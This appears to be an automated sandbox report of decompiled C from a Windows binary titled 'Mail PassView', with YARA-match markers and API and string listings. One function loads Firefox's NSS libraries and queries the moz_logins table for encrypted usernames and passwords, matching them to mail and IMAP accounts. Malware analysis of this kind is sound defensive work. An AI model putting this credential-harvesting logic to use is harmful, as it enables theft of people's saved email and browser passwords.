                                                                                			E0040E4A4(void* __ecx, intOrPtr* __esi, void* __eflags, signed int _a4, signed int _a8, intOrPtr _a12, struct HDC__* _a16, long _a20, long _a24, intOrPtr _a28, signed int _a32, long _a36, intOrPtr _a40, struct tagPOINT _a44, intOrPtr _a48, intOrPtr _a52, intOrPtr _a56, struct tagPOINT _a60, intOrPtr _a64, intOrPtr _a68, intOrPtr _a72, intOrPtr _a76, char _a80, intOrPtr _a84, intOrPtr _a88, intOrPtr _a92, long _a96, struct tagPOINT _a100, intOrPtr _a104, intOrPtr _a108, intOrPtr _a112, struct tagSIZE _a116, struct tagRECT _a124, intOrPtr _a128, intOrPtr _a136, char _a336) {
                                                                                				signed int _v0;
                                                                                				intOrPtr _v4;
                                                                                				intOrPtr _v8;
                                                                                				intOrPtr _v16;
                                                                                				intOrPtr _v20;
                                                                                				signed int _v28;
                                                                                				intOrPtr _v44;
                                                                                				struct HWND__* _v48;
                                                                                				struct HWND__* _v52;
                                                                                				intOrPtr _v60;
                                                                                				intOrPtr _v64;
                                                                                				intOrPtr _v68;
                                                                                				struct HDC__* _t169;
                                                                                				struct HWND__* _t171;
                                                                                				intOrPtr _t223;
                                                                                				void* _t224;
                                                                                				intOrPtr _t235;
                                                                                				struct HWND__* _t237;
                                                                                				void* _t240;
                                                                                				intOrPtr* _t274;
                                                                                				signed int _t275;
                                                                                				signed int _t276;
                                                                                
                                                                                				_t274 = __esi;
                                                                                				_t276 = _t275 & 0xfffffff8;
                                                                                				E004118A0(0x2198, __ecx);
                                                                                				_a12 =  *((intOrPtr*)( *((intOrPtr*)(__esi + 0x10)) + 0x1b4));
                                                                                				_t237 = GetDlgItem( *(__esi + 4), 0x3e9);
                                                                                				_a4 = GetDlgItem( *(__esi + 4), 0x3e8);
                                                                                				_a20 = GetWindowLongA(_t237, 0xfffffff0);
                                                                                				_a24 = GetWindowLongA(_a4, 0xfffffff0);
                                                                                				_a96 = GetWindowLongA(_t237, 0xffffffec);
                                                                                				_a36 = GetWindowLongA(_a4, 0xffffffec);
                                                                                				GetWindowRect(_t237,  &_a100);
                                                                                				GetWindowRect(_a4,  &_a60);
                                                                                				MapWindowPoints(0,  *(__esi + 4),  &_a100, 2);
                                                                                				MapWindowPoints(0,  *(__esi + 4),  &_a60, 2);
                                                                                				_t240 = _a108 - _a100.x;
                                                                                				_a4 = _a4 & 0x00000000;
                                                                                				_a28 = _a68 - _a60.x;
                                                                                				_a76 = _a112 - _a104;
                                                                                				_a40 = _a72 - _a64;
                                                                                				_t169 = GetDC( *(__esi + 4));
                                                                                				_a16 = _t169;
                                                                                				if(_t169 == 0) {
                                                                                					L9:
                                                                                					_v0 = _v0 & 0x00000000;
                                                                                					if( *((intOrPtr*)( *((intOrPtr*)(_t274 + 0x10)) + 0x1b0)) <= 0) {
                                                                                						L12:
                                                                                						_t171 = GetDlgItem( *(_t274 + 4), 1);
                                                                                						_a36 = _t171;
                                                                                						GetWindowRect(_t171,  &_a44);
                                                                                						MapWindowPoints(0,  *(_t274 + 4),  &_a44, 2);
                                                                                						GetClientRect( *(_t274 + 4),  &_a124);
                                                                                						GetWindowRect( *(_t274 + 4),  &_a80);
                                                                                						SetWindowPos( *(_t274 + 4), 0, 0, 0, _a88 - _a80 + 1, _a128 - _a136 - _a48 - _a84 + _a56 + _a92 + _a4 + 0x15, 0x206);
                                                                                						GetClientRect( *(_t274 + 4),  &_a80);
                                                                                						return SetWindowPos(_a36, 0, _a44.x, _a48 - _a56 - _a84 + _a92 - 5, _a52 - _a44 + 1, _a56 - _a48 + 1, 0x204);
                                                                                					}
                                                                                					_a20 = _a20 | 0x10000000;
                                                                                					_a24 = _a24 | 0x10000000;
                                                                                					_a8 = _a12 + 0x10;
                                                                                					do {
                                                                                						 *((intOrPtr*)( *_t274 + 0x1c))(_v0);
                                                                                						_v20 = E00401562(_t274, _a92, "STATIC", _a16, _a96, _v0 + _a100.x, _t240, _a72);
                                                                                						_v44 = E00401562(_t274, _a4, "EDIT", _v8, _a28, _v28 + _a32, _v4,  *(_t274 + 0x14) * _a8);
                                                                                						sprintf( &_a80, "%s:", _v52->i);
                                                                                						_t276 = _t276 + 0xc;
                                                                                						SetWindowTextA(_v48,  &_a80);
                                                                                						SetWindowTextA(_v52,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t274 + 0xc))))))(_v60,  &_a336));
                                                                                						_v60 = _v60 + 0x14;
                                                                                						_v64 = _v64 +  *(_t274 + 0x14) * _v28 +  *((intOrPtr*)(_t274 + 0x18));
                                                                                						_v68 = _v68 + 1;
                                                                                					} while (_v68 <  *((intOrPtr*)( *((intOrPtr*)(_t274 + 0x10)) + 0x1b0)));
                                                                                					goto L12;
                                                                                				}
                                                                                				_t223 = 0;
                                                                                				_a32 = _a32 & 0;
                                                                                				_a8 = 0;
                                                                                				if( *((intOrPtr*)( *((intOrPtr*)(__esi + 0x10)) + 0x1b0)) <= 0) {
                                                                                					L8:
                                                                                					_t224 = _t223 - _t240;
                                                                                					_a28 = _a28 - _t224;
                                                                                					_a60.x = _a60.x + _t224;
                                                                                					_t240 = _t240 + _t224;
                                                                                					ReleaseDC( *(_t274 + 4), _a16);
                                                                                					goto L9;
                                                                                				}
                                                                                				_v0 = _a12 + 0x10;
                                                                                				do {
                                                                                					if(GetTextExtentPoint32A(_a16,  *_v0, strlen( *_v0),  &_a116) != 0) {
                                                                                						_t235 = _a100.x + 0xa;
                                                                                						if(_t235 > _v8) {
                                                                                							_v8 = _t235;
                                                                                						}
                                                                                					}
                                                                                					_a16 =  &(_a16->i);
                                                                                					_v16 = _v16 + 0x14;
                                                                                				} while (_a16 <  *((intOrPtr*)( *((intOrPtr*)(_t274 + 0x10)) + 0x1b0)));
                                                                                				_t223 = _v8;
                                                                                				goto L8;
                                                                                			}


























                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp
                                                                                Similarity
                                                                                • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Releasesprintfstrlen
                                                                                • String ID: %s:$EDIT$STATIC
                                                                                • API String ID: 1703216249-3046471546
                                                                                • Opcode ID: 63f961038f13364f7976eadaedf26f00b3f2f6ee041d7cedeb7d286e156d3b6f
                                                                                • Instruction ID: 2f6da9a5868e125b8128a3bf626dfa5428397bb468519cd7ccc35e9b597c58da
                                                                                • Opcode Fuzzy Hash: 63f961038f13364f7976eadaedf26f00b3f2f6ee041d7cedeb7d286e156d3b6f
                                                                                • Instruction Fuzzy Hash: C9B1DE71108341AFD710DFA8C985A6BBBE9FF88704F008A2DF699D2260D775E814CF16
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 84%
                                                                                			E004010E5(void* __ecx, void* __edx, intOrPtr _a4, struct HDC__* _a8, unsigned int _a12) {
                                                                                				struct tagPOINT _v12;
                                                                                				void* __esi;
                                                                                				void* _t47;
                                                                                				struct HBRUSH__* _t56;
                                                                                				void* _t61;
                                                                                				unsigned int _t62;
                                                                                				void* _t67;
                                                                                				struct HWND__* _t68;
                                                                                				struct HWND__* _t69;
                                                                                				void* _t72;
                                                                                				unsigned int _t73;
                                                                                				struct HWND__* _t75;
                                                                                				struct HWND__* _t76;
                                                                                				struct HWND__* _t77;
                                                                                				struct HWND__* _t78;
                                                                                				unsigned int _t83;
                                                                                				struct HWND__* _t85;
                                                                                				struct HWND__* _t87;
                                                                                				struct HWND__* _t88;
                                                                                				struct tagPOINT _t94;
                                                                                				struct tagPOINT _t96;
                                                                                				void* _t102;
                                                                                				void* _t113;
                                                                                
                                                                                				_t102 = __edx;
                                                                                				_push(__ecx);
                                                                                				_push(__ecx);
                                                                                				_t47 = _a4 - 0x110;
                                                                                				_t113 = __ecx;
                                                                                				if(_t47 == 0) {
                                                                                					__eflags =  *0x417348;
                                                                                					if(__eflags != 0) {
                                                                                						SetDlgItemTextA( *(__ecx + 4), 0x3ee, 0x417348);
                                                                                					} else {
                                                                                						ShowWindow(GetDlgItem( *(__ecx + 4), 0x3ed), 0);
                                                                                						ShowWindow(GetDlgItem( *(_t113 + 4), 0x3ee), 0);
                                                                                					}
                                                                                					SetWindowTextA( *(_t113 + 4), "Mail PassView");
                                                                                					SetDlgItemTextA( *(_t113 + 4), 0x3ea, _t113 + 0xc);
                                                                                					SetDlgItemTextA( *(_t113 + 4), 0x3ec, _t113 + 0x10b);
                                                                                					E00401085(_t113, __eflags);
                                                                                					E00406491(_t102,  *(_t113 + 4));
                                                                                					goto L29;
                                                                                				} else {
                                                                                					_t61 = _t47 - 1;
                                                                                					if(_t61 == 0) {
                                                                                						_t62 = _a8;
                                                                                						__eflags = _t62 - 1;
                                                                                						if(_t62 != 1) {
                                                                                							goto L29;
                                                                                						} else {
                                                                                							__eflags = _t62 >> 0x10;
                                                                                							if(_t62 >> 0x10 != 0) {
                                                                                								goto L29;
                                                                                							} else {
                                                                                								EndDialog( *(__ecx + 4), 1);
                                                                                								DeleteObject( *(_t113 + 0x20c));
                                                                                								goto L8;
                                                                                							}
                                                                                						}
                                                                                					} else {
                                                                                						_t67 = _t61 - 0x27;
                                                                                						if(_t67 == 0) {
                                                                                							_t68 = GetDlgItem( *(__ecx + 4), 0x3ec);
                                                                                							__eflags = _a12 - _t68;
                                                                                							if(_a12 != _t68) {
                                                                                								__eflags =  *0x417388;
                                                                                								if( *0x417388 == 0) {
                                                                                									goto L29;
                                                                                								} else {
                                                                                									_t69 = GetDlgItem( *(_t113 + 4), 0x3ee);
                                                                                									__eflags = _a12 - _t69;
                                                                                									if(_a12 != _t69) {
                                                                                										goto L29;
                                                                                									} else {
                                                                                										goto L18;
                                                                                									}
                                                                                								}
                                                                                							} else {
                                                                                								L18:
                                                                                								SetBkMode(_a8, 1);
                                                                                								SetTextColor(_a8, 0xc00000);
                                                                                								_t56 = GetSysColorBrush(0xf);
                                                                                							}
                                                                                						} else {
                                                                                							_t72 = _t67 - 0xc8;
                                                                                							if(_t72 == 0) {
                                                                                								_t73 = _a12;
                                                                                								_t94 = _t73 & 0x0000ffff;
                                                                                								_v12.x = _t94;
                                                                                								_v12.y = _t73 >> 0x10;
                                                                                								_t75 = GetDlgItem( *(__ecx + 4), 0x3ec);
                                                                                								_push(_v12.y);
                                                                                								_a8 = _t75;
                                                                                								_t76 = ChildWindowFromPoint( *(_t113 + 4), _t94);
                                                                                								__eflags = _t76 - _a8;
                                                                                								if(_t76 != _a8) {
                                                                                									__eflags =  *0x417388;
                                                                                									if( *0x417388 == 0) {
                                                                                										goto L29;
                                                                                									} else {
                                                                                										_t77 = GetDlgItem( *(_t113 + 4), 0x3ee);
                                                                                										_push(_v12.y);
                                                                                										_t78 = ChildWindowFromPoint( *(_t113 + 4), _v12.x);
                                                                                										__eflags = _t78 - _t77;
                                                                                										if(_t78 != _t77) {
                                                                                											goto L29;
                                                                                										} else {
                                                                                											goto L13;
                                                                                										}
                                                                                									}
                                                                                								} else {
                                                                                									L13:
                                                                                									SetCursor(LoadCursorA( *0x416b94, 0x67));
                                                                                									goto L8;
                                                                                								}
                                                                                							} else {
                                                                                								if(_t72 != 0) {
                                                                                									L29:
                                                                                									_t56 = 0;
                                                                                									__eflags = 0;
                                                                                								} else {
                                                                                									_t83 = _a12;
                                                                                									_t96 = _t83 & 0x0000ffff;
                                                                                									_v12.x = _t96;
                                                                                									_v12.y = _t83 >> 0x10;
                                                                                									_t85 = GetDlgItem( *(__ecx + 4), 0x3ec);
                                                                                									_push(_v12.y);
                                                                                									_a8 = _t85;
                                                                                									if(ChildWindowFromPoint( *(_t113 + 4), _t96) != _a8) {
                                                                                										__eflags =  *0x417388;
                                                                                										if( *0x417388 == 0) {
                                                                                											goto L29;
                                                                                										} else {
                                                                                											_t87 = GetDlgItem( *(_t113 + 4), 0x3ee);
                                                                                											_push(_v12.y);
                                                                                											_t88 = ChildWindowFromPoint( *(_t113 + 4), _v12);
                                                                                											__eflags = _t88 - _t87;
                                                                                											if(_t88 != _t87) {
                                                                                												goto L29;
                                                                                											} else {
                                                                                												_push(0x417388);
                                                                                												goto L7;
                                                                                											}
                                                                                										}
                                                                                									} else {
                                                                                										_push(_t113 + 0x10b);
                                                                                										L7:
                                                                                										_push( *(_t113 + 4));
                                                                                										E00406523();
                                                                                										L8:
                                                                                										_t56 = 1;
                                                                                									}
                                                                                								}
                                                                                							}
                                                                                						}
                                                                                					}
                                                                                				}
                                                                                				return _t56;
                                                                                			}


























                                                                                0x0040110d
                                                                                0x0040110d
                                                                                0x00401112
                                                                                0x004011a2
                                                                                0x004011ab
                                                                                0x004011b9
                                                                                0x004011bc
                                                                                0x004011bf
                                                                                0x004011c1
                                                                                0x004011c4
                                                                                0x004011d1
                                                                                0x004011d3
                                                                                0x004011d6
                                                                                0x004011f2
                                                                                0x004011f9
                                                                                0x00000000
                                                                                0x004011ff
                                                                                0x00401207
                                                                                0x00401209
                                                                                0x00401214
                                                                                0x00401216
                                                                                0x00401218
                                                                                0x00000000
                                                                                0x0040121e
                                                                                0x00000000
                                                                                0x0040121e
                                                                                0x00401218
                                                                                0x004011d8
                                                                                0x004011d8
                                                                                0x004011e7
                                                                                0x00000000
                                                                                0x004011e7
                                                                                0x00401118
                                                                                0x0040111a
                                                                                0x0040133b
                                                                                0x0040133b
                                                                                0x0040133b
                                                                                0x00401120
                                                                                0x00401120
                                                                                0x00401129
                                                                                0x00401137
                                                                                0x0040113a
                                                                                0x0040113d
                                                                                0x0040113f
                                                                                0x00401142
                                                                                0x00401154
                                                                                0x0040116f
                                                                                0x00401176
                                                                                0x00000000
                                                                                0x0040117c
                                                                                0x00401184
                                                                                0x00401186
                                                                                0x00401191
                                                                                0x00401193
                                                                                0x00401195
                                                                                0x00000000
                                                                                0x0040119b
                                                                                0x0040119b
                                                                                0x00000000
                                                                                0x0040119b
                                                                                0x00401195
                                                                                0x00401156
                                                                                0x0040115c
                                                                                0x0040115d
                                                                                0x0040115d
                                                                                0x00401160
                                                                                0x00401167
                                                                                0x00401169
                                                                                0x00401169
                                                                                0x00401154
                                                                                0x0040111a
                                                                                0x00401112
                                                                                0x00401107
                                                                                0x004010fe
                                                                                0x00401341

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogLoadModeObject
                                                                                • String ID: Mail PassView
                                                                                • API String ID: 3628558512-272225179
                                                                                • Opcode ID: 8369354600cb7b80dd2c736e043661f8d54616cc87117d1ac6397b61caa72165
                                                                                • Instruction ID: a5e01e197ecdabf9e6bdb75eaf1794657044b10619e6b9182d208ef804a260cb
                                                                                • Opcode Fuzzy Hash: 8369354600cb7b80dd2c736e043661f8d54616cc87117d1ac6397b61caa72165
                                                                                • Instruction Fuzzy Hash: 68518130044248BFEB259F60DE85EAE7BB5EB04700F10853AFA56E65F0C7759D61EB08
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 73%
                                                                                			E0040CE28(void* __ecx, void* __eflags, intOrPtr _a4, char* _a8) {
                                                                                				char* _v8;
                                                                                				int _v12;
                                                                                				char* _v16;
                                                                                				char* _v20;
                                                                                				char* _v24;
                                                                                				int* _v28;
                                                                                				char* _v32;
                                                                                				int _v36;
                                                                                				intOrPtr _v44;
                                                                                				intOrPtr _v48;
                                                                                				intOrPtr _v64;
                                                                                				intOrPtr _v68;
                                                                                				char _v72;
                                                                                				char _v76;
                                                                                				void _v331;
                                                                                				int _v332;
                                                                                				void _v587;
                                                                                				int _v588;
                                                                                				void _v851;
                                                                                				char _v852;
                                                                                				void _v1378;
                                                                                				short _v1380;
                                                                                				void _v1995;
                                                                                				char _v1996;
                                                                                				void _v2611;
                                                                                				char _v2612;
                                                                                				char _v3636;
                                                                                				char _v4660;
                                                                                				char _v5684;
                                                                                				char _v6708;
                                                                                				char _v7732;
                                                                                				void _v8755;
                                                                                				char _v8756;
                                                                                				void* __ebx;
                                                                                				void* __edi;
                                                                                				void* __esi;
                                                                                				signed int _t115;
                                                                                				signed int _t116;
                                                                                				int _t118;
                                                                                				void* _t130;
                                                                                				char* _t170;
                                                                                				intOrPtr _t175;
                                                                                				char* _t177;
                                                                                				int _t196;
                                                                                				intOrPtr _t226;
                                                                                				void* _t229;
                                                                                				int* _t232;
                                                                                				char* _t235;
                                                                                				void* _t237;
                                                                                				void* _t238;
                                                                                				void* _t239;
                                                                                				void* _t240;
                                                                                
                                                                                				E004118A0(0x2234, __ecx);
                                                                                				_t226 = _a4;
                                                                                				_t232 = _t226 + 0x30;
                                                                                				_v28 = _t232;
                                                                                				_t115 = E0040DEEE(_t232, _t226 + 0x362);
                                                                                				if(_t115 == 0) {
                                                                                					L43:
                                                                                					return _t115;
                                                                                				}
                                                                                				_t116 = _t232[1];
                                                                                				_t196 = 0;
                                                                                				if(_t116 == 0) {
                                                                                					_t115 = _t116 | 0xffffffff;
                                                                                				} else {
                                                                                					_t115 =  *_t116(_t226 + 0x158);
                                                                                				}
                                                                                				if(_t115 != _t196) {
                                                                                					L41:
                                                                                					if( *_t232 == _t196) {
                                                                                						goto L43;
                                                                                					}
                                                                                					_t118 = SetCurrentDirectoryA( &(_t232[8]));
                                                                                					 *_t232 = _t196;
                                                                                					return _t118;
                                                                                				} else {
                                                                                					_v36 = _t196;
                                                                                					if(E0040F64B( &_v72, _t226 + 0x362) == 0) {
                                                                                						L39:
                                                                                						_t232 = _v28;
                                                                                						_t115 = _t232[2];
                                                                                						if(_t115 != _t196) {
                                                                                							_t115 =  *_t115();
                                                                                						}
                                                                                						goto L41;
                                                                                					} else {
                                                                                						_v12 = _t196;
                                                                                						_v1380 = _t196;
                                                                                						memset( &_v1378, _t196, 0x208);
                                                                                						_v852 = _t196;
                                                                                						memset( &_v851, _t196, 0x104);
                                                                                						_t239 = _t238 + 0x18;
                                                                                						MultiByteToWideChar(_t196, _t196, _a8, 0xffffffff,  &_v1380, 0x104);
                                                                                						WideCharToMultiByte(0xfde9, _t196,  &_v1380, 0xffffffff,  &_v852, 0x104, _t196, _t196);
                                                                                						if(_v72 != _t196) {
                                                                                							_v72( &_v852,  &_v12);
                                                                                						}
                                                                                						if(_v12 == _t196) {
                                                                                							goto L39;
                                                                                						}
                                                                                						_a8 = _t196;
                                                                                						if(_v68 != _t196) {
                                                                                							_v68(_v12, "SELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_logins", 0xffffffff,  &_a8,  &_v76);
                                                                                							_t239 = _t239 + 0x14;
                                                                                						}
                                                                                						L11:
                                                                                						if(_v64 == _t196) {
                                                                                							_t130 = 0xffff;
                                                                                						} else {
                                                                                							_t130 = _v64(_a8);
                                                                                						}
                                                                                						if(_t130 != 0x64) {
                                                                                							goto L34;
                                                                                						}
                                                                                						_v8756 = _t196;
                                                                                						memset( &_v8755, _t196, 0x3ff);
                                                                                						memset( &_v7732, _t196, 0x1400);
                                                                                						_t240 = _t239 + 0x18;
                                                                                						_t235 = E0040F7EE( &_v72, _a8, 1);
                                                                                						_v20 = E0040F7EE( &_v72, _a8, 6);
                                                                                						_v8 = E0040F7EE( &_v72, _a8, 7);
                                                                                						_v24 = E0040F7EE( &_v72, _a8, 4);
                                                                                						_v32 = E0040F7EE( &_v72, _a8, 5);
                                                                                						_v16 = E0040F7EE( &_v72, _a8, 2);
                                                                                						if(_t235 != _t196) {
                                                                                							strcpy( &_v8756, _t235);
                                                                                						}
                                                                                						if(_v20 != _t196) {
                                                                                							strcpy( &_v7732, _v20);
                                                                                						}
                                                                                						if(_v8 != _t196) {
                                                                                							strcpy( &_v6708, _v8);
                                                                                						}
                                                                                						if(_v24 != _t196) {
                                                                                							strcpy( &_v5684, _v24);
                                                                                						}
                                                                                						if(_v32 != _t196) {
                                                                                							strcpy( &_v4660, _v32);
                                                                                						}
                                                                                						if(_v16 != _t196) {
                                                                                							strcpy( &_v3636, _v16);
                                                                                						}
                                                                                						_v332 = _t196;
                                                                                						memset( &_v331, _t196, 0xff);
                                                                                						_v588 = _t196;
                                                                                						memset( &_v587, _t196, 0xff);
                                                                                						_t239 = _t240 + 0x18;
                                                                                						E0040CD27(_v8, _t226,  &_v588);
                                                                                						E0040CD27(_v20, _t226,  &_v332);
                                                                                						_v8 = _t196;
                                                                                						if( *((intOrPtr*)(_t226 + 0x474)) > _t196) {
                                                                                							_v16 = _t226 + 0x468;
                                                                                							do {
                                                                                								_t237 = E0040D438(_v8, _v16);
                                                                                								_v2612 = _t196;
                                                                                								memset( &_v2611, _t196, 0x261);
                                                                                								_v1996 = _t196;
                                                                                								memset( &_v1995, _t196, 0x261);
                                                                                								_t86 = _t237 + 0x104; // 0x104
                                                                                								_t229 = _t86;
                                                                                								sprintf( &_v2612, "mailbox://%s", _t229);
                                                                                								sprintf( &_v1996, "imap://%s", _t229);
                                                                                								_push( &_v3636);
                                                                                								_t170 =  &_v2612;
                                                                                								_push(_t170);
                                                                                								L004115B2();
                                                                                								_t239 = _t239 + 0x38;
                                                                                								if(_t170 == 0) {
                                                                                									L31:
                                                                                									_t94 = _t237 + 0x304; // 0x304
                                                                                									E004060D0(0xff, _t94,  &_v588);
                                                                                									_t96 = _t237 + 0x204; // 0x204
                                                                                									E004060D0(0xff, _t96,  &_v332);
                                                                                									_t196 = 0;
                                                                                									goto L32;
                                                                                								}
                                                                                								_push( &_v3636);
                                                                                								_t177 =  &_v1996;
                                                                                								_push(_t177);
                                                                                								L004115B2();
                                                                                								if(_t177 != 0) {
                                                                                									goto L32;
                                                                                								}
                                                                                								goto L31;
                                                                                								L32:
                                                                                								_v8 =  &(_v8[1]);
                                                                                								_t175 = _a4;
                                                                                							} while (_v8 <  *((intOrPtr*)(_t175 + 0x474)));
                                                                                							_t226 = _t175;
                                                                                						}
                                                                                						goto L11;
                                                                                						L34:
                                                                                						if(_a8 != _t196 && _v48 != _t196) {
                                                                                							_v48(_a8);
                                                                                						}
                                                                                						if(_v44 != _t196) {
                                                                                							_v44(_v12);
                                                                                						}
                                                                                						goto L39;
                                                                                					}
                                                                                				}
                                                                                			}

                                                                                APIs
                                                                                  • Part of subcall function 0040DEEE: memset.MSVCRT ref: 0040DF0F
                                                                                  • Part of subcall function 0040DEEE: GetCurrentDirectoryA.KERNEL32(00000104,?,?,?,00000000), ref: 0040DF3E
                                                                                  • Part of subcall function 0040DEEE: SetCurrentDirectoryA.KERNEL32(00000000,?,?,00000000), ref: 0040DF4B
                                                                                  • Part of subcall function 0040DEEE: memset.MSVCRT ref: 0040DF62
                                                                                  • Part of subcall function 0040DEEE: strlen.MSVCRT ref: 0040DF6C
                                                                                  • Part of subcall function 0040DEEE: strlen.MSVCRT ref: 0040DF7A
                                                                                  • Part of subcall function 0040DEEE: GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,00000000), ref: 0040DFB3
                                                                                  • Part of subcall function 0040DEEE: LoadLibraryExA.KERNEL32(00000000,00000000,00000008,?,?,?,?,?,?,?,00000000), ref: 0040DFCF
                                                                                  • Part of subcall function 0040DEEE: LoadLibraryExA.KERNEL32(00000000,00000000,00000008,?,?,?,?,?,?,?,00000000), ref: 0040DFE7
                                                                                  • Part of subcall function 0040DEEE: GetProcAddress.KERNEL32(?,NSS_Init), ref: 0040DFFC
                                                                                  • Part of subcall function 0040DEEE: GetProcAddress.KERNEL32(?,NSS_Shutdown), ref: 0040E008
                                                                                  • Part of subcall function 0040DEEE: GetProcAddress.KERNEL32(?,PK11_GetInternalKeySlot), ref: 0040E014
                                                                                  • Part of subcall function 0040DEEE: GetProcAddress.KERNEL32(?,PK11_FreeSlot), ref: 0040E020
                                                                                  • Part of subcall function 0040DEEE: GetProcAddress.KERNEL32(?,PK11_CheckUserPassword), ref: 0040E02C
                                                                                  • Part of subcall function 0040DEEE: GetProcAddress.KERNEL32(?,PK11_Authenticate), ref: 0040E038
                                                                                • memset.MSVCRT ref: 0040CEA6
                                                                                • memset.MSVCRT ref: 0040CEBF
                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,0040D314,000000FF,?,00000104,?,00000000,?,0040D314,?,00000000,?,?,?), ref: 0040CED6
                                                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00000104,00000000,00000000,?,0040D314,?,00000000,?,?,?), ref: 0040CEF5
                                                                                • memset.MSVCRT ref: 0040CF68
                                                                                • memset.MSVCRT ref: 0040CF7A
                                                                                • strcpy.MSVCRT(?,00000000,0040D314,00000002,0040D314,00000005,0040D314,00000004,0040D314,00000007,0040D314,00000006,0040D314,00000001), ref: 0040CFED
                                                                                • strcpy.MSVCRT(?,?,0040D314,00000002,0040D314,00000005,0040D314,00000004,0040D314,00000007,0040D314,00000006,0040D314,00000001), ref: 0040D003
                                                                                • strcpy.MSVCRT(?,00000000,0040D314,00000002,0040D314,00000005,0040D314,00000004,0040D314,00000007,0040D314,00000006,0040D314,00000001), ref: 0040D019
                                                                                • strcpy.MSVCRT(?,?,0040D314,00000002,0040D314,00000005,0040D314,00000004,0040D314,00000007,0040D314,00000006,0040D314,00000001), ref: 0040D02F
                                                                                • strcpy.MSVCRT(?,?,0040D314,00000002,0040D314,00000005,0040D314,00000004,0040D314,00000007,0040D314,00000006,0040D314,00000001), ref: 0040D045
                                                                                • strcpy.MSVCRT(?,0040D314,0040D314,00000002,0040D314,00000005,0040D314,00000004,0040D314,00000007,0040D314,00000006,0040D314,00000001), ref: 0040D05B
                                                                                • memset.MSVCRT ref: 0040D076
                                                                                • memset.MSVCRT ref: 0040D08A
                                                                                • memset.MSVCRT ref: 0040D0ED
                                                                                • memset.MSVCRT ref: 0040D101
                                                                                • sprintf.MSVCRT ref: 0040D119
                                                                                • sprintf.MSVCRT ref: 0040D12B
                                                                                • _stricmp.MSVCRT(?,?,?,imap://%s,00000104,?,mailbox://%s,00000104,?,00000000,00000261,?,00000000,00000261,?,?), ref: 0040D13E
                                                                                • _stricmp.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040D158
                                                                                • SetCurrentDirectoryA.KERNEL32(?,?,?,?,00000000,?,0040D314,?,00000000,?,?,?), ref: 0040D1DD
                                                                                Strings
                                                                                • SELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_logins, xrefs: 0040CF2B
                                                                                • mailbox://%s, xrefs: 0040D113
                                                                                • imap://%s, xrefs: 0040D125
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: memset$AddressProcstrcpy$CurrentDirectory$ByteCharLibraryLoadMultiWide_stricmpsprintfstrlen$HandleModule
                                                                                • String ID: SELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_logins$imap://%s$mailbox://%s
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 76%
                                                                                			E0040A774(intOrPtr __ecx, void* __eflags) {
                                                                                				void* __ebx;
                                                                                				void* __edi;
                                                                                				void* __esi;
                                                                                				struct HMENU__* _t121;
                                                                                				struct HWND__* _t122;
                                                                                				intOrPtr _t128;
                                                                                				int _t133;
                                                                                				intOrPtr _t135;
                                                                                				int _t149;
                                                                                				void* _t166;
                                                                                				void* _t174;
                                                                                				void* _t178;
                                                                                				void* _t185;
                                                                                				intOrPtr _t194;
                                                                                				void* _t197;
                                                                                				void* _t198;
                                                                                				intOrPtr _t200;
                                                                                				intOrPtr _t201;
                                                                                				void* _t202;
                                                                                				int _t204;
                                                                                				intOrPtr _t205;
                                                                                				intOrPtr* _t207;
                                                                                				intOrPtr* _t208;
                                                                                				void* _t210;
                                                                                				intOrPtr* _t211;
                                                                                				void* _t213;
                                                                                
                                                                                				_t213 = __eflags;
                                                                                				_t208 = _t210 - 0x78;
                                                                                				_t211 = _t210 - 0xb8;
                                                                                				 *((intOrPtr*)(_t208 + 0x70)) = __ecx;
                                                                                				 *((char*)(_t208 - 0x37)) = 1;
                                                                                				 *(_t208 - 0x40) = 0;
                                                                                				 *((intOrPtr*)(_t208 - 0x3c)) = 0;
                                                                                				 *((char*)(_t208 - 0x38)) = 0;
                                                                                				 *((char*)(_t208 - 0x36)) = 0;
                                                                                				 *((char*)(_t208 - 0x35)) = 0;
                                                                                				asm("stosd");
                                                                                				asm("stosd");
                                                                                				 *(_t208 - 0x2c) = 1;
                                                                                				 *((intOrPtr*)(_t208 - 0x28)) = 0x9c41;
                                                                                				 *((char*)(_t208 - 0x24)) = 4;
                                                                                				 *((char*)(_t208 - 0x23)) = 0;
                                                                                				 *((char*)(_t208 - 0x22)) = 0;
                                                                                				 *((char*)(_t208 - 0x21)) = 0;
                                                                                				asm("stosd");
                                                                                				asm("stosd");
                                                                                				 *((intOrPtr*)(_t208 - 0x18)) = 5;
                                                                                				 *((intOrPtr*)(_t208 - 0x14)) = 0x9c44;
                                                                                				 *((char*)(_t208 - 0x10)) = 4;
                                                                                				 *((char*)(_t208 - 0xf)) = 0;
                                                                                				 *((char*)(_t208 - 0xe)) = 0;
                                                                                				 *((char*)(_t208 - 0xd)) = 0;
